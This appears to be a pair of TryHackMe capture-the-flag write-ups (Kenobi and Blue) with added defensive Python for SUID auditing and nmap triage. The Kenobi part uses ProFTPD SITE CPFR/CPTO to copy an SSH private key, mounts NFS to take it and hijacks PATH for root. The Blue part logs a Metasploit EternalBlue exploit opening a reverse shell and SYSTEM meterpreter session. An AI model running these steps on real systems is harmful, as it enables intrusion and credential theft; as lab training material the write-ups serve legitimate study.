    |_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s
    |_nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
    | smb-os-discovery: 
    |   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
    |   Computer name: kenobi
    |   NetBIOS computer name: KENOBI\x00
    |   Domain name: \x00
    |   FQDN: kenobi
    |_  System time: 2020-08-29T06:56:47-05:00
    | smb-security-mode: 
    |   account_used: guest
    |   authentication_level: user
    |   challenge_response: supported
    |_  message_signing: disabled (dangerous, but default)
    | smb2-security-mode: 
    |   2.02: 
    |_    Message signing enabled but not required
    | smb2-time: 
    |   date: 2020-08-29T11:56:47
    |_  start_date: N/A
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 40.34 seconds
    
  2. Knowing that SMB and RPC are available, let's script scan SMB first.

    nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse <Machine_IP> -oN nmap/smb445   
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-29 07:44 CDT
    Nmap scan report for<Machine_IP> 
    Host is up (0.21s latency).
    
    PORT    STATE SERVICE
    445/tcp open  microsoft-ds
    
    Host script results:
    | smb-enum-shares: 
    |   account_used: guest
    |   \\1<Machine_IP>\IPC$: 
    |     Type: STYPE_IPC_HIDDEN
    |     Comment: IPC Service (kenobi server (Samba, Ubuntu))
    |     Users: 1
    |     Max Users: <unlimited>
    |     Path: C:\tmp
    |     Anonymous access: READ/WRITE
    |     Current user access: READ/WRITE
    |   \\<Machine_IP>\anonymous: 
    |     Type: STYPE_DISKTREE
    |     Comment: 
    |     Users: 0
    |     Max Users: <unlimited>
    |     Path: C:\home\kenobi\share
    |     Anonymous access: READ/WRITE
    |     Current user access: READ/WRITE
    |   \\1<Machine_IP>\print$: 
    |     Type: STYPE_DISKTREE
    |     Comment: Printer Drivers
    |     Users: 0
    |     Max Users: <unlimited>
    |     Path: C:\var\lib\samba\printers
    |     Anonymous access: <none>
    |_    Current user access: <none>
    |_smb-enum-users: ERROR: Script execution failed (use -d to debug)
    
    Nmap done: 1 IP address (1 host up) scanned in 43.14 seconds
    
  3. Now let's script scan RPC.

    nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount <Machine_IP> -oN nmap/rpc111
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-29 07:47 CDT
    Nmap scan report for 10.10.1.115
    Host is up (0.30s latency).
    
    PORT    STATE SERVICE
    111/tcp open  rpcbind
    | nfs-showmount: 
    |_  /var *
    
    Nmap done: 1 IP address (1 host up) scanned in 2.33 seconds
    

SMB client

  • Smb client

    smbclient //<Machine_IP>/Anonymous 
    Enter WORKGROUP\skibum's password: 
    Try "help" to get a list of possible commands.
    smb: \> ls
      .                                   D        0  Wed Sep  4 05:49:09 2019
      ..                                  D        0  Wed Sep  4 05:56:07 2019
      log.txt                             N    12237  Wed Sep  4 05:49:09 2019
    
            9204224 blocks of size 1024. 6877100 blocks available
    smb: \> get log.txt
    getting file \log.txt of size 12237 as log.txt (12.2 KiloBytes/sec) (average 12.2 KiloBytes/sec)
    smb: \> exit
    

cat log.txt


## FTP

1. Try and connect to the FTP service and copy the key with SITE CPFR / SITE CPTO

    nc <Machine_IP> 21
    220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) []
    SITE CPFR /home/kenobi/.ssh/id_rsa
    350 File or directory exists, ready for destination name
    SITE CPTO /var/tmp/id_rsa
    250 Copy successful


2. Exploit proFTPD 1.3.5: retrieve the copied key through the NFS export of /var

    mkdir /mnt/kenobiNFS
    mount <Machine_IP>:/var /mnt/kenobiNFS
    ls -la /mnt/kenobiNFS


3. ssh into the machine

    ssh -i id_rsa kenobi@<Machine_IP>

## priv esc

1. Find SUID files

    find / -perm /4000 -type f 2>/dev/null

Look for something that stands out.

  • /sbin/mount.nfs
  • /usr/lib/policykit-1/polkit-agent-helper-1
  • /usr/lib/dbus-1.0/dbus-daemon-launch-helper
  • /usr/lib/snapd/snap-confine
  • /usr/lib/eject/dmcrypt-get-device
  • /usr/lib/openssh/ssh-keysign
  • /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
  • /usr/bin/chfn
  • /usr/bin/newgidmap
  • /usr/bin/pkexec
  • /usr/bin/passwd
  • /usr/bin/newuidmap
  • /usr/bin/gpasswd
  • /usr/bin/menu
  • /usr/bin/sudo
  • /usr/bin/chsh
  • /usr/bin/at
  • /usr/bin/newgrp
  • /bin/umount
  • /bin/fusermount
  • /bin/mount
  • /bin/ping
  • /bin/su
  • /bin/ping6
  1. Run and check out the binary that stands out (/usr/bin/menu).

    1. status check
    2. kernel version
    3. ifconfig
    ** Enter your choice :1
    HTTP/1.1 200 OK
    Date: Sat, 29 Aug 2020 17:51:48 GMT
    Server: Apache/2.4.18 (Ubuntu)
    Last-Modified: Wed, 04 Sep 2019 09:07:20 GMT
    ETag: "c8-591b6884b6ed2"
    Accept-Ranges: bytes
    Content-Length: 200
    Vary: Accept-Encoding
    Content-Type: text/html


    Note that the status check runs a curl command; can we override the PATH so the machine picks up our own curl?

  2. Try and overwrite the machine's curl command (the fake curl has to live in /tmp, the directory prepended to PATH).

    cd /tmp
    echo /bin/sh > curl
    chmod 777 curl
    export PATH=/tmp:$PATH
    /usr/bin/menu

    1. status check
    2. kernel version
    3. ifconfig
    ** Enter your choice :1
    # id
    uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
    # whoami
    root

P0wn3d!!!!
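Two things made the priv esc above work: a SUID binary that is not part of the distribution (/usr/bin/menu) and a program that calls `curl` by bare name, so a writable directory placed ahead of /usr/bin in PATH decides which curl runs as root. As an added example (not part of this write-up), the Python below turns both observations into checks a defender can run on a host: it reproduces the `find / -perm /4000 -type f` walk, diffs the result against a per-image baseline, and reports which PATH entries a caller could write to before the trusted binary directory is reached. The baseline is constructed here from the page's own find output with the custom binary left out; in practice it is recorded from a clean build of the same image.

```python
import os
import stat

# Constructed sample: the `find / -perm /4000 -type f` output from the write-up.
FIND_OUTPUT = """
/sbin/mount.nfs
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/bin/menu
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/at
/usr/bin/newgrp
/bin/umount
/bin/fusermount
/bin/mount
/bin/ping
/bin/su
/bin/ping6
"""

# Constructed baseline: the page's SUID set minus the box's custom binary.  Record one
# per image from a clean build and keep it under version control.
BASELINE_SUID = {
    "/sbin/mount.nfs", "/usr/lib/policykit-1/polkit-agent-helper-1",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper", "/usr/lib/snapd/snap-confine",
    "/usr/lib/eject/dmcrypt-get-device", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic", "/usr/bin/chfn", "/usr/bin/newgidmap",
    "/usr/bin/pkexec", "/usr/bin/passwd", "/usr/bin/newuidmap", "/usr/bin/gpasswd",
    "/usr/bin/sudo", "/usr/bin/chsh", "/usr/bin/at", "/usr/bin/newgrp", "/bin/umount",
    "/bin/fusermount", "/bin/mount", "/bin/ping", "/bin/su", "/bin/ping6",
}


def scan_suid(root: str = "/") -> list:
    """Python equivalent of `find / -perm /4000 -type f`: regular files with the set-uid bit."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable or vanished entry, same as find's 2>/dev/null
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(path)
    return sorted(found)


def unexpected_suid(found, baseline=BASELINE_SUID) -> list:
    """SUID binaries absent from the baseline: the ones worth reading (/usr/bin/menu here)."""
    return sorted({p.strip() for p in found if p.strip()} - baseline)


def hijackable_path_dirs(path_env: str, trusted_dir: str, is_writable) -> list:
    """Directories searched before `trusted_dir` that the caller can write to.  A SUID
    program that runs a bare command name (menu calls `curl`) resolves it through this
    PATH, so any writable directory ahead of the real binary's directory can shadow it.
    `is_writable` is a predicate so the logic can be tested without touching the filesystem."""
    hits = []
    for entry in path_env.split(":"):
        d = entry or "."  # an empty PATH entry means the current directory
        if d == trusted_dir:
            break
        if is_writable(d):
            hits.append(d)
    return hits


def audit(found, path_env, is_writable=lambda d: os.access(d, os.W_OK)) -> dict:
    return {"unexpected_suid": unexpected_suid(found),
            "shadowing_dirs": hijackable_path_dirs(path_env, "/usr/bin", is_writable)}


if __name__ == "__main__":
    print(audit(scan_suid("/"), os.environ.get("PATH", "")))
```

The second check explains why the fix for a helper like `menu` is not a smarter PATH but no PATH at all: a privileged program should exec `/usr/bin/curl` by absolute path with a reset environment, and a status check that only needs an HTTP HEAD has no reason to be SUID root in the first place.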

THM - Blue

Blue

Skibum 5/2/2020


IP address 10.10.124.30

Recon

kali@kali:~/Documents/THM/blue$ sudo nmap -sC -sV 10.10.124.30

    Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-02 20:44 EDT
    Nmap scan report for 10.10.124.30
    Host is up (0.14s latency).
    Not shown: 991 closed ports
    PORT      STATE SERVICE        VERSION
    135/tcp   open  msrpc          Microsoft Windows RPC
    139/tcp   open  netbios-ssn    Microsoft Windows netbios-ssn
    445/tcp   open  microsoft-ds   Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
    3389/tcp  open  ms-wbt-server?
    |_ssl-date: 2020-05-03T00:45:47+00:00; -1s from scanner time.
    49152/tcp open  msrpc          Microsoft Windows RPC
    49153/tcp open  msrpc          Microsoft Windows RPC
    49154/tcp open  msrpc          Microsoft Windows RPC
    49158/tcp open  msrpc          Microsoft Windows RPC
    49160/tcp open  msrpc          Microsoft Windows RPC
    Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

    Host script results:
    |_clock-skew: mean: 1h14m58s, deviation: 2h30m00s, median: -1s
    |_nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:a7:6a:15:93:60 (unknown)
    | smb-os-discovery: 
    |   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
    |   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
    |   Computer name: Jon-PC
    |   NetBIOS computer name: JON-PC\x00
    |   Workgroup: WORKGROUP\x00
    |_  System time: 2020-05-02T19:45:41-05:00
    | smb-security-mode: 
    |   account_used: guest
    |   authentication_level: user
    |   challenge_response: supported
    |_  message_signing: disabled (dangerous, but default)
    | smb2-security-mode: 
    |   2.02: 
    |_    Message signing enabled but not required
    | smb2-time: 
    |   date: 2020-05-03T00:45:41
    |_  start_date: 2020-05-03T00:37:19

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 157.74 seconds

kali@kali:~/Documents/THM/blue$ nmap --script=smb-vuln-ms* 10.10.124.30

    Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-02 21:08 EDT
    Nmap scan report for 10.10.124.30
    Host is up (0.14s latency).
    Not shown: 991 closed ports
    PORT      STATE SERVICE
    135/tcp   open  msrpc
    139/tcp   open  netbios-ssn
    445/tcp   open  microsoft-ds
    3389/tcp  open  ms-wbt-server
    49152/tcp open  unknown
    49153/tcp open  unknown
    49154/tcp open  unknown
    49158/tcp open  unknown
    49160/tcp open  unknown

    Host script results:
    |_smb-vuln-ms10-054: false
    |_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
    | smb-vuln-ms17-010: 
    |   VULNERABLE:
    |   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
    |     State: VULNERABLE
    |     IDs:  CVE:CVE-2017-0143
    |     Risk factor: HIGH
    |       A critical remote code execution vulnerability exists in Microsoft SMBv1
    |        servers (ms17-010).
    |           
    |     Disclosure date: 2017-03-14
    |     References:
    |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
    |       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
    |_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

    Nmap done: 1 IP address (1 host up) scanned in 14.75 seconds
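
The host-script block above is what a triage pipeline has to read: `smb-vuln-ms17-010` reports `State: VULNERABLE` with a CVE id, `smb-vuln-ms10-054` reports a bare `false`, `smb-vuln-ms10-061` could not even run (`NT_STATUS_ACCESS_DENIED`), and the two security-mode scripts show SMB signing disabled / not required. The parser below is an added example, not part of this write-up or of nmap; it groups the `|`-prefixed lines by script, extracts state, risk and CVE ids, and flags the signing weaknesses. The sample input is a re-typed copy of the scan output shown above.

```python
"""Turn an nmap host-script block into triage findings (added example)."""
import re
from typing import Dict, List

# Constructed sample: the relevant lines of the nmap host-script output above.
SAMPLE_NSE_OUTPUT = """\
Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
"""

# A script's first line is "| name: ..." or "|_name: ..."; continuation lines are
# indented further, which the single optional space in this pattern rejects.
SCRIPT_LINE = re.compile(r"^\|_? ?([A-Za-z0-9-]+):\s*(.*)$")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")


def split_scripts(text: str) -> Dict[str, List[str]]:
    """Group the '|' lines under the NSE script that produced them."""
    scripts: Dict[str, List[str]] = {}
    current = None
    for raw in text.splitlines():
        if not raw.startswith("|"):
            continue
        m = SCRIPT_LINE.match(raw)
        if m:
            current = m.group(1)
            first = m.group(2).strip()
            scripts[current] = [first] if first else []
        elif current is not None:
            scripts[current].append(raw.lstrip("|_").strip())
    return scripts


def vuln_findings(scripts: Dict[str, List[str]]) -> List[dict]:
    """Summarise every smb-vuln-* script: state, risk factor and CVE ids."""
    findings = []
    for name, lines in scripts.items():
        if not name.startswith("smb-vuln-"):
            continue
        state, risk = None, None
        for line in lines:
            if line.startswith("State:"):
                state = line.split(":", 1)[1].strip()
            elif line.startswith("Risk factor:"):
                risk = line.split(":", 1)[1].strip()
        if state is None:  # single-line form: "false" or an NT_STATUS error
            if lines == ["false"]:
                state = "not vulnerable"
            elif lines and lines[0].startswith("NT_STATUS"):
                state = f"unknown (check failed: {lines[0]})"
            else:
                state = "unknown"
        cves = sorted(set(CVE_RE.findall(" ".join(lines))))
        findings.append({"script": name, "state": state, "risk": risk, "cves": cves})
    return findings


def smb_signing_issues(scripts: Dict[str, List[str]]) -> List[str]:
    """Signing weaknesses reported by smb-security-mode / smb2-security-mode."""
    issues = []
    for line in scripts.get("smb-security-mode", []):
        if line.startswith("message_signing:") and "disabled" in line:
            issues.append("SMB1 message signing disabled")
    for line in scripts.get("smb2-security-mode", []):
        if "not required" in line.lower():
            issues.append("SMB2 message signing not required")
    return issues


if __name__ == "__main__":
    parsed = split_scripts(SAMPLE_NSE_OUTPUT)
    for f in vuln_findings(parsed):
        print(f"{f['script']:<22} {f['state']:<40} {','.join(f['cves'])}")
    for issue in smb_signing_issues(parsed):
        print("signing:", issue)
```

The distinction between "not vulnerable" and "check failed" matters: `NT_STATUS_ACCESS_DENIED` is not a clean result, so the host should stay on the follow-up list rather than being marked safe.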

Metasploit

metasploit search

    msf5>search ms17

    Matching Modules
    ================

       #   Name                                                   Disclosure Date  Rank     Check  Description
       -   ----                                                   ---------------  ----     -----  -----------                                    
       0   auxiliary/admin/mssql/mssql_enum_domain_accounts                        normal   No     Microsoft SQL Server SUSER_SNAME Windows Domain Account Enumeration                                                                                                                          
       1   auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli                   normal   No     Microsoft SQL Server SQLi SUSER_SNAME Windows Domain Account Enumeration                                                                                                                     
       2   auxiliary/admin/mssql/mssql_enum_sql_logins                             normal   No     Microsoft SQL Server SUSER_SNAME SQL Logins Enumeration                                                                                                                                      
       3   auxiliary/admin/mssql/mssql_escalate_execute_as                         normal   No     Microsoft SQL Server Escalate EXECUTE AS       
       4   auxiliary/admin/mssql/mssql_escalate_execute_as_sqli                    normal   No     Microsoft SQL Server SQLi Escalate Execute AS  
       5   auxiliary/admin/smb/ms17_010_command                   2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution                                                                                                  
       6   auxiliary/scanner/smb/smb_ms17_010                                      normal   No     MS17-010 SMB RCE Detection                     
       7   exploit/windows/fileformat/office_ms17_11882           2017-11-15       manual   No     Microsoft Office CVE-2017-11882                
       8   exploit/windows/smb/ms17_010_eternalblue               2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption                                                                                                                               
       9   exploit/windows/smb/ms17_010_eternalblue_win8          2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+                                                                                                                     
       10  exploit/windows/smb/ms17_010_psexec                    2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution                                                                                                     
       11  exploit/windows/smb/smb_doublepulsar_rce               2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution   

Run Scanner

msf5 auxiliary(scanner/smb/smb_ms17_010) > show options

    Module options (auxiliary/scanner/smb/smb_ms17_010):

       Name         Current Setting                                                 Required  Description
       ----         ---------------                                                 --------  -----------
       CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
       CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
       CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
       NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
       RHOSTS       10.10.124.30                                                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT        445                                                             yes       The SMB service port (TCP)
       SMBDomain    .                                                               no        The Windows domain to use for authentication
       SMBPass                                                                      no        The password for the specified username
       SMBUser                                                                      no        The username to authenticate as
       THREADS      1                                                               yes       The number of concurrent threads (max one per host)

    msf5 auxiliary(scanner/smb/smb_ms17_010) > run

    [+] 10.10.124.30:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
    /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/connection_adapters/abstract_adapter.rb:84: warning: deprecated Object#=~ is called on Integer; it always returns nil
    /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activemodel-4.2.11.1/lib/active_model/validations/numericality.rb:68: warning: deprecated Object#=~ is called on Integer; it always returns nil
    /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/statement_cache.rb:90: warning: Capturing the given block using Proc.new is deprecated; use `&block` instead

    [*] 10.10.124.30:445      - Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed

Run Exploit

msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.124.30

    RHOSTS => 10.10.124.30
    msf5 exploit(windows/smb/ms17_010_eternalblue) > run

    [*] Started reverse TCP handler on 10.9.9.59:4444 
    [*] 10.10.124.30:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
    [+] 10.10.124.30:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
    /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/statement_cache.rb:90: warning: Capturing the given block using Proc.new is deprecated; use `&block` instead
    [*] 10.10.124.30:445      - Scanned 1 of 1 hosts (100% complete)
    [*] 10.10.124.30:445 - Connecting to target for exploitation.
    [+] 10.10.124.30:445 - Connection established for exploitation.
    [+] 10.10.124.30:445 - Target OS selected valid for OS indicated by SMB reply
    [*] 10.10.124.30:445 - CORE raw buffer dump (42 bytes)
    [*] 10.10.124.30:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
    [*] 10.10.124.30:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
    [*] 10.10.124.30:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
    [+] 10.10.124.30:445 - Target arch selected valid for arch indicated by DCE/RPC reply
    [*] 10.10.124.30:445 - Trying exploit with 12 Groom Allocations.
    [*] 10.10.124.30:445 - Sending all but last fragment of exploit packet
    [*] 10.10.124.30:445 - Starting non-paged pool grooming
    [+] 10.10.124.30:445 - Sending SMBv2 buffers
    [+] 10.10.124.30:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
    [*] 10.10.124.30:445 - Sending final SMBv2 buffers.
    [*] 10.10.124.30:445 - Sending last fragment of exploit packet!
    [*] 10.10.124.30:445 - Receiving response from exploit packet
    [+] 10.10.124.30:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
    [*] 10.10.124.30:445 - Sending egg to corrupted connection.
    [*] 10.10.124.30:445 - Triggering free of corrupted buffer.
    /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/statement_cache.rb:90: warning: Capturing the given block using Proc.new is deprecated; use `&block` instead
    /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/statement_cache.rb:90: warning: Capturing the given block using Proc.new is deprecated; use `&block` instead
    /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/statement_cache.rb:90: warning: Capturing the given block using Proc.new is deprecated; use `&block` instead
    [*] Command shell session 1 opened (10.9.9.59:4444 -> 10.10.124.30:49219) at 2020-05-02 21:18:53 -0400
    [+] 10.10.124.30:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    [+] 10.10.124.30:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    [+] 10.10.124.30:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Granted Access

C:\Windows\system32>

Upgrade Session

msf5 post(multi/manage/shell_to_meterpreter) > sessions -u 1

    [*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

    [*] Upgrading session ID: 1
    [*] Starting exploit/multi/handler
    [*] Started reverse TCP handler on 10.9.9.59:4433 
    msf5 post(multi/manage/shell_to_meterpreter) > 
    [*] Sending stage (180291 bytes) to 10.10.124.30
    /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/statement_cache.rb:90: warning: Capturing the given block using Proc.new is deprecated; use `&block` instead
    [*] Meterpreter session 2 opened (10.9.9.59:4433 -> 10.10.124.30:49233) at 2020-05-02 21:30:13 -0400
    /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/connection_adapters/abstract_adapter.rb:84: warning: deprecated Object#=~ is called on Integer; it always returns nil
    /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/connection_adapters/abstract_adapter.rb:84: warning: deprecated Object#=~ is called on Integer; it always returns nil
    /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/statement_cache.rb:90: warning: Capturing the given block using Proc.new is deprecated; use `&block` instead
    /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/statement_cache.rb:90: warning: Capturing the given block using Proc.new is deprecated; use `&block` instead
    /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/statement_cache.rb:90: warning: Capturing the given block using Proc.new is deprecated; use `&block` instead
    [*] Stopping exploit/multi/handler

msf5 post(multi/manage/shell_to_meterpreter) > sessions

    Active sessions
    ===============

      Id  Name  Type                     Information                                                                       Connection
      --  ----  ----                     -----------                                                                       ----------
      1         shell x64/windows        Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation...  10.9.9.59:4444 -> 10.10.124.30:49231 (10.10.124.30)
      2         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ JON-PC                                                      10.9.9.59:4433 -> 10.10.124.30:49233 (10.10.124.30)

msf5 post(multi/manage/shell_to_meterpreter) > sessions -i 2

    [*] Starting interaction with 2...

meterpreter > getuid

    Server username: NT AUTHORITY\SYSTEM

meterpreter > ps

      Process List
      ============

       PID   PPID  Name                  Arch  Session  User                          Path
       ---   ----  ----                  ----  -------  ----                          ----
       0     0     [System Process]                                                   
       4     0     System                x64   0                                      
       100   668   LogonUI.exe           x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\LogonUI.exe
       356   716   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
       416   4     smss.exe              x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\smss.exe
       460   716   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
       568   560   csrss.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
       616   560   wininit.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wininit.exe
       628   608   csrss.exe             x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
       668   608   winlogon.exe          x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\winlogon.exe
       716   616   services.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\services.exe
       724   616   lsass.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsass.exe
       732   616   lsm.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsm.exe
       788   716   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
       840   716   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
       908   716   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
       932   1372  powershell.exe        x86   0        NT AUTHORITY\SYSTEM           C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
       956   716   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
       1116  716   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
       1228  716   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
       1356  716   spoolsv.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
       1372  2020  powershell.exe        x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
       1392  716   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
       1452  716   amazon-ssm-agent.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe
       1528  716   LiteAgent.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\Xentools\LiteAgent.exe
       1600  932   cmd.exe               x86   0        NT AUTHORITY\SYSTEM           C:\Windows\SysWOW64\cmd.exe
       1676  716   Ec2Config.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe
       1952  1356  cmd.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\cmd.exe
       1996  716   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
       2080  840   WmiPrvSE.exe          x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\wbem\WmiPrvSE.exe
       2208  568   conhost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\conhost.exe
       2236  1356  cmd.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\cmd.exe
       2340  568   conhost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\conhost.exe
       2520  716   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
       2584  716   vds.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\vds.exe
       2624  716   sppsvc.exe            x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\sppsvc.exe
       2752  716   SearchIndexer.exe     x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\SearchIndexer.exe
